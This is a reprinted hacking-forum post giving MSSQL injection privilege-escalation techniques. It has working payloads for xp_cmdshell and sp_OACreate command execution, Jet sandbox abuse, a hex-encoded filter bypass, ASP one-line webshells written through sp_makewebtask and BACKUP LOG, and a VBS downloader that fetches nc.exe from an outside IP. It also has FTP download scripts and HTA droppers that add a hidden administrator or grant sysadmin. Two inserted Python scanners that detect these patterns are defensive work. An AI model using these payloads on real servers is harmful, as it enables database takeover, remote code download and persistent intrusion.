Methods for Elevation of Privilege in MSSQL Injection

Source: Internet
Author: User

Ideas for elevation of privilege through MSSQL injection:
SA privileges: escalate directly through extended stored procedures such as xp_cmdshell and sp_OACreate (prerequisite: the stored procedure still exists on the server).
Related SQL statements
xp_cmdshell:
Numeric type: ;exec master.dbo.xp_cmdshell 'cmdline'--
Character & search type: ';exec master.dbo.xp_cmdshell 'cmdline'--
sp_OACreate:
Numeric type: ;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c cmdline'--
Character & search type: ';declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c cmdline'--
P.S. (On Windows 2000 change WINDOWS to WINNT)

Sandbox escalation:
Enable sandbox mode: ;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engines','sandboxmode','reg_dword',1--
Then execute the system command through Jet OLE DB: ;select * from openrowset('Microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias.mdb','select shell("cmd.exe /c cmdline")')--
P.S. (On Windows 2000 change WINDOWS to WINNT)

Back up a one-line Trojan directly: ;exec sp_makewebtask 'absolute web path\fuck.asp','select ''<%25execute(request("a"))%25>'''--
P.S. (Requires WEB and DATA on the same host and a known web directory)

How to download files to the target host:
Use a tool such as NBSI to write a VBS file:
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://125.113.114.49/nc.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 >c:\labeng.vbs
Purpose of this statement: write a VBS file named labeng.vbs to drive C.
Then run cscript c:\labeng.vbs; the VBS file downloads http://125.113.114.49/nc.exe to c:\c.exe.

FTP & TFTP transfer:
FTP:
Commands:
echo ftp>ftp.txt
echo open 125.*.*.*>>ftp.txt
echo username>>ftp.txt
echo password>>ftp.txt
echo get xx.exe>>ftp.txt
echo bye>>ftp.txt
Purpose: write an ftp.txt file with the content
ftp
open 125.*.*.*
username
password
get xx.exe
bye
Then execute ftp -s:ftp.txt; the target host connects to 125.*.*.* and downloads xx.exe.
TFTP is similar.

DB permission:
WEB & DATA on the same host: 1. Find the web directory, get a webshell via LOG or differential backup, then escalate. 2. Guess the table, take the administrator account and password, and get a webshell through the admin backend. 3. Back up the privilege escalation statement into the startup items and wait for a reboot.
Separated hosts: 1. Take the administrator account and password from the table and get a webshell through the admin backend. 2. Back up the privilege escalation statement into the startup items and wait for a reboot.

Determine the IP address of the DATA host:
Locally run nc -l -v -p 1433 to listen on port 1433
;insert into opendatasource('sqloledb','server=your own IP;uid=test;pwd=test;database=test').test.dbo.ku select name from master.dbo.sysdatabases--

Brute-force the web path (P.S. DATA & WEB on the same host)
;create table labeng(lala nvarchar(255) null)--
;declare @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','System\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng(lala) values(@result)--
;and 1=(select count(*) from labeng where lala>1)-- or ;and 1=(select top 1 lala from labeng)--

Bypassing filters:
;declare @s varchar(4000);set @s=cast(<hex of the SQL statement> as varchar(4000));exec(@s)--

LOG backup statements:
;alter database dbname set recovery full--
;create table cmd(a image)--
;backup log dbname to disk='c:\sammy' with init--
;insert into cmd(a) values('<%25execute(request("value"))%25>')--
;backup log dbname to disk='web directory\1.asp'--
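From the defender's side, every technique listed so far (xp_cmdshell, sp_OACreate, xp_regwrite plus the Jet sandbox, openrowset/opendatasource, sp_makewebtask, xp_regread, the hex-encoded EXEC(@s) filter bypass, BACKUP LOG to a web path, and the later sp_addsrvrolemember grant) leaves a distinctive statement in an application query log or SQL audit trail. The scanner below is an added example, not code from the original post; the log line format ("<timestamp> user=<login> stmt=<sql>"), the rule names and all sample lines are constructed here. It decodes 0x... literals before matching, so the CAST/EXEC trick from the filter-bypass section does not hide the keyword.

```python
"""Added defensive example: flag MSSQL injection / privilege-escalation
patterns in query-log lines.  Log format and samples are constructed."""
import re

# One pattern per technique from the text.  Rule names are arbitrary labels.
RULES = [
    ("os-command-exec",    re.compile(r"\bxp_cmdshell\b", re.I)),
    ("ole-automation",     re.compile(r"\bsp_oa(create|method|getproperty|setproperty|destroy)\b", re.I)),
    ("registry-write",     re.compile(r"\bxp_reg(write|addmultistring|delete(key|value))\b", re.I)),
    ("registry-read",      re.compile(r"\bxp_reg(read|enum(keys|values))\b", re.I)),
    ("adhoc-remote-query", re.compile(r"\bopen(rowset|datasource)\s*\(", re.I)),
    ("jet-sandbox",        re.compile(r"microsoft\.jet\.oledb|\bsandboxmode\b", re.I)),
    ("webtask",            re.compile(r"\bsp_makewebtask\b", re.I)),
    ("backup-to-web-path", re.compile(
        r"\bbackup\s+(log|database)\b[^;]*?\bto\s+disk\s*=\s*'[^']*\.(asp|aspx|php|jsp|hta|bat|exe)'", re.I)),
    ("role-escalation",    re.compile(r"\bsp_addsrvrolemember\b|\balter\s+server\s+role\b", re.I)),
    ("dynamic-exec",       re.compile(r"\bexec(ute)?\s*\(\s*@\w+\s*\)", re.I)),
]

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")


def decode_hex_literals(sql):
    """Replace 0x... literals that decode to printable ASCII with their text,
    so CAST(0x... AS VARCHAR); EXEC(@s) cannot hide a keyword from the rules."""
    def repl(match):
        raw = match.group(1)
        if len(raw) % 2:
            return match.group(0)
        try:
            text = bytes.fromhex(raw).decode("ascii")
        except ValueError:          # non-ASCII bytes: leave the literal alone
            return match.group(0)
        if not text.isprintable():
            return match.group(0)
        return "/*hex*/" + text + "/*endhex*/"
    return HEX_LITERAL.sub(repl, sql)


def classify(sql, decode=True):
    """Return the sorted list of rule names that match one statement."""
    text = decode_hex_literals(sql) if decode else sql
    return sorted(name for name, pat in RULES if pat.search(text))


def parse_line(line):
    """Constructed format: '<timestamp> user=<login> stmt=<sql text>'."""
    ts, _, rest = line.partition(" ")
    user_field, _, stmt = rest.partition(" stmt=")
    user = user_field[5:] if user_field.startswith("user=") else user_field
    return {"time": ts, "user": user, "stmt": stmt}


def scan(lines):
    """Return (time, user, [rule names]) for every line that matches a rule."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        hits = classify(rec["stmt"])
        if hits:
            findings.append((rec["time"], rec["user"], hits))
    return findings


# Constructed sample input: a benign query, the page's techniques with harmless
# arguments, and one legitimate DBA backup that must not fire.
HEX_PAYLOAD = "exec master..xp_cmdshell 'dir'".encode("ascii").hex()
SAMPLE_LOG = [
    "2024-05-01T10:00:01 user=webapp stmt=SELECT name FROM products WHERE id = 17",
    "2024-05-01T10:00:02 user=webapp stmt=SELECT name FROM products WHERE id = 17; exec master..xp_cmdshell 'whoami'--",
    "2024-05-01T10:00:03 user=webapp stmt=SELECT 1; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'cmd.exe /c whoami'--",
    "2024-05-01T10:00:04 user=webapp stmt=exec master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\\Microsoft\\Jet\\4.0\\Engines', 'sandboxmode', 'reg_dword', 1--",
    "2024-05-01T10:00:05 user=webapp stmt=select * from openrowset('Microsoft.Jet.OLEDB.4.0', ';database=c:\\temp\\x.mdb', 'select 1')--",
    "2024-05-01T10:00:06 user=webapp stmt=DECLARE @s varchar(4000); SET @s = CAST(0x" + HEX_PAYLOAD + " AS VARCHAR(4000)); EXEC(@s)--",
    "2024-05-01T10:00:07 user=webapp stmt=backup log shopdb to disk = 'c:\\inetpub\\wwwroot\\1.asp'--",
    "2024-05-01T10:00:08 user=dba stmt=backup log shopdb to disk = 'd:\\backups\\shopdb.trn' with init",
    "2024-05-01T10:00:09 user=webapp stmt=exec sp_addsrvrolemember 'webapp', 'sysadmin'--",
]

if __name__ == "__main__":
    for time, user, hits in scan(SAMPLE_LOG):
        print(time, user, ", ".join(hits))
```

The rules are deliberately keyed on procedure names rather than on the injection prefix (the ; or ' and the trailing --), because the same procedures appear in stored-procedure bodies and DBA sessions; correlating on the login (an application account calling xp_cmdshell or BACKUP LOG) is what makes a hit actionable. The hex decoder only rewrites literals that decode to printable ASCII, so binary image data in a legitimate INSERT is left untouched.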

One-line shell variants:
A). <%25Execute(request("go"))%25>
B). <%Execute(request("go"))%>
C). %><%execute request("go")%><%
D). <script language=VBScript runat=server>execute request("sb")</script>
E). <%25Execute(request("l"))%25>

Back up a file to the startup items:
Replace '<%25execute(request("value"))%25>' in the LOG backup with the hexadecimal content of a file such as an HTA or BAT.

Example: labeng.hta
Content:
<script language="VBScript">
On error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c net1.exe user test$ labeng?123 /add & net1.exe localgroup Administrators test$ /add & del labeng.hta", 0
</script><script language=javascript>window.close();</script>
-----------------------------------------------------------------------------
Convert to hexadecimal:
(hexadecimal bytes of the file)
-----------------------------------------------------------------------------
SQL statement:
;insert into cmd(a) values(<hexadecimal bytes>)--

-----------------------------------------------------------------------------
Elevate the SQL user to sa:
<script language="VBScript">
On error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c echo exec master.dbo.sp_addsrvrolemember boayo,sysadmin > c:\test.qry & isql -E -U alma -P -i c:\test.qry & del labeng.hta", 0
</script><script language=javascript>window.close();</script>
Usage is the same as above.
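The one-line shell variants A to E and the two HTA droppers above end up as files on disk: under the web root (written by BACKUP LOG or sp_makewebtask) or in a Startup folder. The content scanner below is an added defensive example, not code from the original post; its rule names, the sample file contents and the file paths are constructed. Its main point is normalisation: variants A and E use %25 so that the ASP delimiters only appear after percent-decoding, and a rule that requires <% ... %> misses them unless the content is decoded first.

```python
"""Added defensive example: detect the ASP one-line shells and HTA droppers
from the text in file contents.  Samples and paths are constructed."""
import re
from urllib.parse import unquote

FILE_RULES = [
    # <% ... execute(request(...)) ... %>, also the "execute request(" form
    ("asp-execute-request", re.compile(r'<%.*?\bexecute\s*\(?\s*request\s*\(.*?%>', re.I | re.S)),
    # <script language=VBScript runat=server>execute request("x")</script>
    ("asp-runat-server",    re.compile(r'runat\s*=\s*"?server"?[^>]*>.*?\bexecute\s*\(?\s*request\s*\(', re.I | re.S)),
    # HTA / VBS that creates WScript.Shell and calls .run
    ("wscript-shell-run",   re.compile(r'createobject\s*\(\s*"wscript\.shell"\s*\).*?\.run\b', re.I | re.S)),
    ("local-admin-add",     re.compile(r'\bnet1?(\.exe)?\s+localgroup\s+administrators\b.*?/add', re.I | re.S)),
    ("sysadmin-role-grant", re.compile(r'\bsp_addsrvrolemember\b', re.I)),
    ("self-delete",         re.compile(r'\bdel\s+\S+\.hta\b', re.I)),
]


def normalize(text, rounds=3):
    """Percent-decode repeatedly (bounded) so %25-encoded delimiters surface."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def detect(content, decode=True):
    """Return the sorted rule names matching one file's content."""
    text = normalize(content) if decode else content
    return sorted(name for name, pat in FILE_RULES if pat.search(text))


def scan_files(files):
    """files: {path: content}.  Returns {path: [rule names]} for flagged files."""
    flagged = {}
    for path, content in files.items():
        hits = detect(content)
        if hits:
            flagged[path] = hits
    return flagged


# Constructed samples: the five variants from the text, two HTA droppers with
# placeholder account names, and a benign ASP page that must not fire.
WEBSHELL_VARIANTS = {
    "A": '<%25Execute(request("go"))%25>',
    "B": '<%Execute(request("go"))%>',
    "C": '%><%execute request("go")%><%',
    "D": '<script language=VBScript runat=server>execute request("sb")</script>',
    "E": '<%25Execute(request("l"))%25>',
}
HTA_ADMIN_ADD = (
    '<script language="VBScript">\n'
    'On error resume next\n'
    'Set WS = createobject("WScript.Shell")\n'
    'WS.run "cmd /c net1.exe user test$ Passw0rd /add & net1.exe localgroup '
    'Administrators test$ /add & del labeng.hta", 0\n'
    '</script><script language=javascript>window.close();</script>\n'
)
HTA_SYSADMIN = (
    '<script language="VBScript">\n'
    'On error resume next\n'
    'Set WS = createobject("WScript.Shell")\n'
    'WS.run "cmd /c echo exec master.dbo.sp_addsrvrolemember appuser,sysadmin '
    '> c:\\test.qry & isql -E -i c:\\test.qry & del labeng.hta", 0\n'
    '</script><script language=javascript>window.close();</script>\n'
)
BENIGN_ASP = (
    '<%\nDim id\nid = Request.QueryString("id")\n'
    'Response.Write Server.HTMLEncode(id)\n%>\n'
)
SAMPLE_FILES = {
    "wwwroot/default.asp": BENIGN_ASP,
    "wwwroot/1.asp": WEBSHELL_VARIANTS["A"],
    "wwwroot/2.asp": WEBSHELL_VARIANTS["D"],
    "startup/labeng.hta": HTA_ADMIN_ADD,
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(path, ", ".join(hits))
```

Note that the HTA rules match the dropper in cleartext form; the SQL side of the same technique (the INSERT of the file's hex bytes into the image column followed by BACKUP LOG to a Startup path) is what the query-log scanner earlier on this page catches, since the hex is decoded there before the rules run.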

 

Reprinted from csdn
